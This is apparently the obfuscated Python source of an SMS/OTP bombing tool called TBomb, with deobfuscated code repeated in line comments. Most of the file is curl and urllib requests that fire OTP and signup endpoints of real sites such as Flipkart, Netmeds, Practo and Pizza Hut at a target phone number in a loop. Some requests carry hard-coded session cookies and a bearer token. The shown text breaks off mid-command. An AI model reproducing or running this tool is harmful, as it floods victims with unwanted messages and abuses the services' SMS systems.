─────────────────────────────────────────────────────────────────────────────────────────────────────── ─██████████████─██████─────────██████████████─██████──────────██████─██████████─██████──────────██████─ ─██░░░░░░░░░░██─██░░██─────────██░░░░░░░░░░██─██░░██████████████░░██─██░░░░░░██─██░░██████████──██░░██─ ─██░░██████░░██─██░░██─────────██░░██████░░██─██░░░░░░░░░░░░░░░░░░██─████░░████─██░░░░░░░░░░██──██░░██─ ─██░░██──██░░██─██░░██─────────██░░██──██░░██─██░░██████░░██████░░██───██░░██───██░░██████░░██──██░░██─ ─██░░██████░░██─██░░██─────────██░░██████░░██─██░░██──██░░██──██░░██───██░░██───██░░██──██░░██──██░░██─ ─██░░░░░░░░░░██─██░░██─────────██░░░░░░░░░░██─██░░██──██░░██──██░░██───██░░██───██░░██──██░░██──██░░██─ ─██░░██████░░██─██░░██─────────██░░██████░░██─██░░██──██████──██░░██───██░░██───██░░██──██░░██──██░░██─ ─██░░██──██░░██─██░░██─────────██░░██──██░░██─██░░██──────────██░░██───██░░██───██░░██──██░░██████░░██─ ─██░░██──██░░██─██░░██████████─██░░██──██░░██─██░░██──────────██░░██─████░░████─██░░██──██░░░░░░░░░░██─ ─██░░██──██░░██─██░░░░░░░░░░██─██░░██──██░░██─██░░██──────────██░░██─██░░░░░░██─██░░██──██████████░░██─ ─██████──██████─██████████████─██████──██████─██████──────────██████─██████████─██████──────────██████─ ─────────────────────────────────────────────────────────────────────────────────────────────────────── """,'green')#line:252:""", 'green') print ()#line:253:print() count_inf =0 #line:257:count_inf = 0 def infinite (OOO0OO00OO0O0OO0O ,O0OO00O000O00000O ,O0OO0OO0OO00O000O ,OOO0O000000000OO0 ):#line:260:def infinite(pn, dl, ch, max): global count_inf #line:261:global count_inf while True :#line:262:while True: while os .path .exists ('proc.xxx'):#line:263:while os.path.exists('proc.xxx'): time .sleep (0.5 )#line:264:time.sleep(0.5) os .system ('touch proc.xxx')#line:265:os.system('touch proc.xxx') OOO00O00O000O00OO =random .choice (O0OO0OO0OO00O000O )#line:266:api = random.choice(ch) try :#line:267:try: O0OO00O00000O000O =getapi (OOO0OO00OO0O0OO0O ,OOO00O00O000O00OO ,91 )#line:268:ret = getapi(pn, api, 91) except Exception :#line:269:except Exception: O0OO00O00000O000O =False #line:270:ret = False if not O0OO00O00000O000O :#line:271:if not ret: while O0OO0OO0OO00O000O .count (OOO00O00O000O00OO )>0 :#line:272:while ch.count(api) > 0: O0OO0OO0OO00O000O .remove (OOO00O00O000O00OO )#line:273:ch.remove(api) continue #line:274:continue os .system ('rm proc.xxx >/dev/null 2>&1')#line:275:os.system('rm proc.xxx >/dev/null 2>&1') count_inf +=1 #line:276:count_inf += 1 time .sleep (float (O0OO00O000O00000O ))#line:278:time.sleep(float(dl)) if (count_inf >maxlim ):#line:279:if (count_inf > maxlim): exit ()#line:280:exit() def checkinternet ():#line:283:def checkinternet(): OOOO0O0O00OO000O0 =False #line:284:res = False try :#line:285:try: requests .get ('https://www.google.com',verify =True )#line:286:requests.get('https://www.google.com', verify=True) OOOO0O0O00OO000O0 =False #line:287:res = False except Exception :#line:288:except Exception: OOOO0O0O00OO000O0 =True #line:289:res = True if OOOO0O0O00OO000O0 :#line:290:if res: print ("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")#line:291:print("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...") print ('\t\tTBomb Will Stop Now...\n\n')#line:292:print('\t\tTBomb Will Stop Now...\n\n') banner ()#line:293:banner() exit ()#line:294:exit() def getapi (O00OO00OO0OO0O0OO ,OOO0O0OOOOO0O00OO ,OO0000O0O00O0OOO0 ):#line:297:def getapi(pn, lim, cc): global country_codes #line:298:global country_codes OO0000O0O00O0OOO0 =str (OO0000O0O00O0OOO0 ).strip ()#line:299:cc = str(cc).strip() O0000OO0OOOOO000O =country_codes [OO0000O0O00O0OOO0 ]#line:300:cnn = country_codes[cc] OOO0O0OOOOO0O00OO =int (OOO0O0OOOOO0O00OO )#line:301:lim = int(lim) OO0O00O0OO000O0OO =["https://www.oyorooms.com/api/pwa/generateotp?country_code=%2B"+str (OO0000O0O00O0OOO0 )+"&nod=4&phone="+O00OO00OO0OO0O0OO ,"https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo="+O00OO00OO0OO0O0OO ,"https://securedapi.confirmtkt.com/api/platform/register?mobileNumber="+O00OO00OO0OO0O0OO ]#line:303:str(cc) + "&nod=4&phone=" + pn, "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=" + pn, "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + pn] try :#line:304:try: if OOO0O0OOOOO0O00OO <len (OO0O00O0OO000O0OO ):#line:305:if lim < len(url): urllib .request .urlopen (str (OO0O00O0OO000O0OO [OOO0O0OOOOO0O00OO ]))#line:306:urllib.request.urlopen(str(url[lim])) return True #line:307:return True except (urllib .error .HTTPError ,urllib .error .URLError ):#line:308:except (urllib.error.HTTPError, urllib.error.URLError): return False #line:309:return False if OOO0O0OOOOO0O00OO ==3 :#line:310:if lim == 3: os .system ('curl -s -X POST -H "Host:m.netmeds.com" -H "content-length:76" -H "accept:*/*" -H "origin:https://m.netmeds.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://m.netmeds.com/customer/account/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:checkmobileno-popup=quWqfunF" -H "cookie:section_data_ids=%7B%22cart%22%3A1559721914%2C%22directory-data%22%3A1559721853%7D" -H "cookie:mage-messages=" -H "cookie:_gat_UA-63910444-1=1" -H "cookie:_gac_UA-63910444-1=1.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_gcl_aw=GCL.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_nmstracking=| sms | ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsUTMtrackingsource=ADW-CPC-Search-NMS-Brand-OC&ADW-CPC-Search-NMS-Brand-OC&CPC&ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsCampaign=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsMedium=CPC" -H "cookie:_nmsSource=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsAttr=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:private_content_version=eef016e2f8225f631d4a6e1cf8cdf4ac" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:form_key=YGWpwHiCN5uglOtY" -H "cookie:_gid=GA1.3.93227781.1559647218" -H "cookie:mage-translation-file-version=%7B%7D" -H "cookie:mage-translation-storage=%7B%7D" -H "cookie:_gcl_au=1.1.656472353.1559647214" -H "cookie:PHPSESSID=b5i36rg02l2jg9cielmm9fl7c6" -H "cookie:cto_lwid=e5917844-4f1b-48f9-bf74-b0bfdd5c79ce" -H "cookie:bsCoId=3558720339100" -H "cookie:bsUl=0" -H "cookie:_fbp=fb.1.1558720332185.799068042" -H "cookie:_ga=GA1.3.185497001.1558720330" -d \'register_mobileno='+O00OO00OO0OO0O0OO +'&logintype=Otp&uniq_identy=quWqfunF&forget_pwd=N\' "https://m.netmeds.com/sociallogin/popup/nmsgetcode/" > /dev/null 2>&1')#line:311:os.system('curl -s -X POST -H "Host:m.netmeds.com" -H "content-length:76" -H "accept:*/*" -H "origin:https://m.netmeds.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://m.netmeds.com/customer/account/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:checkmobileno-popup=quWqfunF" -H "cookie:section_data_ids=%7B%22cart%22%3A1559721914%2C%22directory-data%22%3A1559721853%7D" -H "cookie:mage-messages=" -H "cookie:_gat_UA-63910444-1=1" -H "cookie:_gac_UA-63910444-1=1.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_gcl_aw=GCL.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_nmstracking=| sms | ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsUTMtrackingsource=ADW-CPC-Search-NMS-Brand-OC&ADW-CPC-Search-NMS-Brand-OC&CPC&ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsCampaign=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsMedium=CPC" -H "cookie:_nmsSource=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsAttr=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:private_content_version=eef016e2f8225f631d4a6e1cf8cdf4ac" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:form_key=YGWpwHiCN5uglOtY" -H "cookie:_gid=GA1.3.93227781.1559647218" -H "cookie:mage-translation-file-version=%7B%7D" -H "cookie:mage-translation-storage=%7B%7D" -H "cookie:_gcl_au=1.1.656472353.1559647214" -H "cookie:PHPSESSID=b5i36rg02l2jg9cielmm9fl7c6" -H "cookie:cto_lwid=e5917844-4f1b-48f9-bf74-b0bfdd5c79ce" -H "cookie:bsCoId=3558720339100" -H "cookie:bsUl=0" -H "cookie:_fbp=fb.1.1558720332185.799068042" -H "cookie:_ga=GA1.3.185497001.1558720330" -d \'register_mobileno=' + pn + '&logintype=Otp&uniq_identy=quWqfunF&forget_pwd=N\' "https://m.netmeds.com/sociallogin/popup/nmsgetcode/" > /dev/null 2>&1') return True #line:312:return True elif OOO0O0OOOOO0O00OO ==4 :#line:313:elif lim == 4: os .system ('curl -s -X POST -H "Host:client-api.goomo.com" -H "origin:https://www.goomo.com" -H "client:m-web" -H "x-goomo-platform:mWeb" -H "dnt:1" -H "content-type:application/json" -H "accept:*/*" -H "referer:https://www.goomo.com/hotels" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -d \'{"email":"fakeemail@gmail.com","phone_number":"'+O00OO00OO0OO0O0OO +'","country_code":"'+OO0000O0O00O0OOO0 +'"}\' "https://client-api.goomo.com/v2/phone_confirmation/verify_user" > /dev/null 2>&1')#line:315:'curl -s -X POST -H "Host:client-api.goomo.com" -H "origin:https://www.goomo.com" -H "client:m-web" -H "x-goomo-platform:mWeb" -H "dnt:1" -H "content-type:application/json" -H "accept:*/*" -H "referer:https://www.goomo.com/hotels" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -d \'{"email":"fakeemail@gmail.com","phone_number":"' + pn + '","country_code":"' + cc + '"}\' "https://client-api.goomo.com/v2/phone_confirmation/verify_user" > /dev/null 2>&1') return True #line:316:return True elif OOO0O0OOOOO0O00OO ==5 :#line:317:elif lim == 5: os .system ('curl -s -X POST -H "Accept:*/*" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-US,en;q=0.5" -H "Connection:keep-alive" -H "Content-Length:34" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:www.oriyamatrimony.com" -H "Referer:https://www.oriyamatrimony.com/" -H "User-Agent:Mozilla/5.0 (Windows NT 8.1; Win64; x64; rv:59.0) Gecko/20 Firefox/56.0" -H "X-Requested-With:XMLHttpRequest" -d "countrycode='+OO0000O0O00O0OOO0 +'&mobileno='+O00OO00OO0OO0O0OO +'" "https://www.oriyamatrimony.com/login/mobileappsms-homepage.php" > /dev/null 2>&1')#line:319:cc + '&mobileno=' + pn + '" "https://www.oriyamatrimony.com/login/mobileappsms-homepage.php" > /dev/null 2>&1') return True #line:320:return True elif OOO0O0OOOOO0O00OO ==6 :#line:321:elif lim == 6: os .system ('curl -s -X POST -H "host:www.flipkart.com" -H "user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" -H "accept:*/*" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.flipkart.com/" -H "x-user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop" -H "origin:https://www.flipkart.com" -H "connection:keep-alive" -H "Content-Type:application/json; charset=utf-8" -H "Content-Length:53" -d \'{"loginId":["+'+OO0000O0O00O0OOO0 +O00OO00OO0OO0O0OO +'"],"supportAllStates":true}\' "https://www.flipkart.com/api/6/user/signup/status" > /dev/null 2>&1')#line:323:'curl -s -X POST -H "host:www.flipkart.com" -H "user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" -H "accept:*/*" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.flipkart.com/" -H "x-user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop" -H "origin:https://www.flipkart.com" -H "connection:keep-alive" -H "Content-Type:application/json; charset=utf-8" -H "Content-Length:53" -d \'{"loginId":["+' + cc + pn + '"],"supportAllStates":true}\' "https://www.flipkart.com/api/6/user/signup/status" > /dev/null 2>&1') return True #line:324:return True elif OOO0O0OOOOO0O00OO ==7 :#line:325:elif lim == 7: os .system ('curl -s -X POST -H "Host:www.flipkart.com" -H "Connection:keep-alive" -H "Content-Length:60" -H "X-user-agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop" -H "Origin:https://www.flipkart.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded" -H "Accept:*/*" -H "Referer:https://www.flipkart.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:T=BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050; SWAB=build-44be9e47461a74d737914207bcbafc30; lux_uid=155867904381892986; AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg=1; AMCV_17EB401053DAF4840A490D4C%40AdobeOrg=-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI; s_cc=true; SN=2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078; gpv_pn=HomePage; gpv_pn_t=Homepage; S=d1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==; s_sq=%5B%5BB%5D%5D" -d \'loginId=+'+OO0000O0O00O0OOO0 +O00OO00OO0OO0O0OO +'&state=VERIFIED&churnEmailRequest=false\' "https://www.flipkart.com/api/5/user/otp/generate" > /dev/null 2>&1')#line:326:os.system('curl -s -X POST -H "Host:www.flipkart.com" -H "Connection:keep-alive" -H "Content-Length:60" -H "X-user-agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop" -H "Origin:https://www.flipkart.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded" -H "Accept:*/*" -H "Referer:https://www.flipkart.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:T=BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050; SWAB=build-44be9e47461a74d737914207bcbafc30; lux_uid=155867904381892986; AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg=1; AMCV_17EB401053DAF4840A490D4C%40AdobeOrg=-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI; s_cc=true; SN=2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078; gpv_pn=HomePage; gpv_pn_t=Homepage; S=d1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==; s_sq=%5B%5BB%5D%5D" -d \'loginId=+' + cc + pn + '&state=VERIFIED&churnEmailRequest=false\' "https://www.flipkart.com/api/5/user/otp/generate" > /dev/null 2>&1') return True #line:327:return True elif OOO0O0OOOOO0O00OO ==8 :#line:328:elif lim == 8: os .system ('curl -s -X POST -H "Host:www.ref-r.com" -H "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Accept-Language:en-US,en;q=0.5" -H "Accept-Encoding:gzip, deflate, br" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "X-Requested-With:XMLHttpRequest" -H "Content-Length:26" -H "DNT:1" -H "Connection:keep-alive" -d "mobile='+O00OO00OO0OO0O0OO +'&submit=1&undefined=" "https://www.ref-r.com/clients/lenskart/smsApi" > /dev/null 2>&1')#line:329:os.system('curl -s -X POST -H "Host:www.ref-r.com" -H "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Accept-Language:en-US,en;q=0.5" -H "Accept-Encoding:gzip, deflate, br" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "X-Requested-With:XMLHttpRequest" -H "Content-Length:26" -H "DNT:1" -H "Connection:keep-alive" -d "mobile=' + pn + '&submit=1&undefined=" "https://www.ref-r.com/clients/lenskart/smsApi" > /dev/null 2>&1') return True #line:330:return True elif OOO0O0OOOOO0O00OO ==9 :#line:331:elif lim == 9: OO00OO0O000O00OOO =os .popen ('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B'+OO0000O0O00O0OOO0 +O00OO00OO0OO0O0OO +'&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read ()#line:332:rd = os.popen('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B' + cc + pn + '&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read() return OO00OO0O000O00OOO .find ("success")!=-1 #line:333:return rd.find("success") != -1 elif OOO0O0OOOOO0O00OO ==10 :#line:334:elif lim == 10: os .system ('curl -s -X POST -H "Host:m.pizzahut.co.in" -H "content-length:114" -H "origin:https://m.pizzahut.co.in" -H "authorization:Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4" -H "x-source-origin:PWAFW" -H "content-type:application/json" -H "accept:application/json, text/plain, */*" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "save-data:on" -H "languagecode:en" -H "referer:https://m.pizzahut.co.in/login" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_fbp=fb.2.1559973905081.1516144968" -H "cookie:_gat_UA-37858192-4=1" -H "cookie:_ga-ss=1|UA-37858192-4|https%3A%2F%2Fwww.google.com%2F" -H "cookie:_gid=GA1.3.1666290082.1559973902" -H "cookie:_ga=GA1.3.1893416092.1559973902" -H "cookie:run_fullstory_for_user=full_story_fail" -H "cookie:_gcl_au=1.1.2020385110.1559973902" -H "cookie:AKA_A2=A" -d \'{"customer":{"MobileNo":"'+O00OO00OO0OO0O0OO +'","UserName":"'+O00OO00OO0OO0O0OO +'","merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}\' "https://m.pizzahut.co.in/api/cart/send-otp?langCode=en" > /dev/null 2>&1')#line:336:'curl -s -X POST -H "Host:m.pizzahut.co.in" -H "content-length:114" -H "origin:https://m.pizzahut.co.in" -H "authorization:Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4" -H "x-source-origin:PWAFW" -H "content-type:application/json" -H "accept:application/json, text/plain, */*" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "save-data:on" -H "languagecode:en" -H "referer:https://m.pizzahut.co.in/login" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_fbp=fb.2.1559973905081.1516144968" -H "cookie:_gat_UA-37858192-4=1" -H "cookie:_ga-ss=1|UA-37858192-4|https%3A%2F%2Fwww.google.com%2F" -H "cookie:_gid=GA1.3.1666290082.1559973902" -H "cookie:_ga=GA1.3.1893416092.1559973902" -H "cookie:run_fullstory_for_user=full_story_fail" -H "cookie:_gcl_au=1.1.2020385110.1559973902" -H "cookie:AKA_A2=A" -d \'{"customer":{"MobileNo":"' + pn + '","UserName":"' + pn + '","merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}\' "https://m.pizzahut.co.in/api/cart/send-otp?langCode=en" > /dev/null 2>&1') return True #line:337:return True elif OOO0O0OOOOO0O00OO ==11 :#line:338:elif lim == 11: os .system ('curl -s -X POST -H "host:www.goibibo.com" -H "user-agent:Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0" -H "accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.goibibo.com/mobile/?sms=success" -H "content-type:application/x-www-form-urlencoded" -H "content-length:14" -H "connection:keep-alive" -H "upgrade-insecure-requests:1" -d "mbl='+O00OO00OO0OO0O0OO +'" "https://www.goibibo.com/common/downloadsms/" > /dev/null 2>&1')#line:339:os.system('curl -s -X POST -H "host:www.goibibo.com" -H "user-agent:Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0" -H "accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.goibibo.com/mobile/?sms=success" -H "content-type:application/x-www-form-urlencoded" -H "content-length:14" -H "connection:keep-alive" -H "upgrade-insecure-requests:1" -d "mbl=' + pn + '" "https://www.goibibo.com/common/downloadsms/" > /dev/null 2>&1') return True #line:340:return True elif OOO0O0OOOOO0O00OO ==12 :#line:341:elif lim == 12: os .popen ('rm temp.xxx1 > /dev/null 2>&1')#line:342:os.popen('rm temp.xxx1 > /dev/null 2>&1') os .system ('curl -s -X POST -H "Host:www.apollopharmacy.in" -H "content-length:17" -H "accept:*/*" -H "origin:https://www.apollopharmacy.in" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H 